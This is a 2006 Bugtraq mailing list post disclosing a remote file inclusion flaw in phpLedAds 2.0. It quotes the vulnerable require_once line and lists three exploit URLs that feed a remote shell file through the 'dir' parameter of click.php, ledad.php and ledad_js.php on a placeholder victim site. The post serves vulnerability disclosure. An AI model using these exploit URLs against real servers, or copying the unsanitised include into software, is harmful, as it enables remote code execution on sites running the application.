Home page logo
/

bugtraq logo Bugtraq mailing list archives

phpLedAds 2.0(dir) File Include
From: "mahmood ali" <mah_k_2000 () hotmail com>
Date: Fri, 27 Oct 2006 18:10:40 +0000

###################################################
phpLedAds 2.0(dir) File Include
###################################################
Source Code:

ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip

###################################################
Vulnerable Code:_

click.php & ledad.php & ledad_js.php

###################################################
In Line 41 :_

require_once($dir . '/ad_class.php');

###################################################
Exploit :_

http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad_js.php?dir=Sh3ll.txt?

###################################################

Discoverd By :  Mahmood_ali

###################################################

Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM

###################################################

_________________________________________________________________
Windows LiveĀ™ Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb


  By Date           By Thread  

Current thread:
  • phpLedAds 2.0(dir) File Include mahmood ali (Oct 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]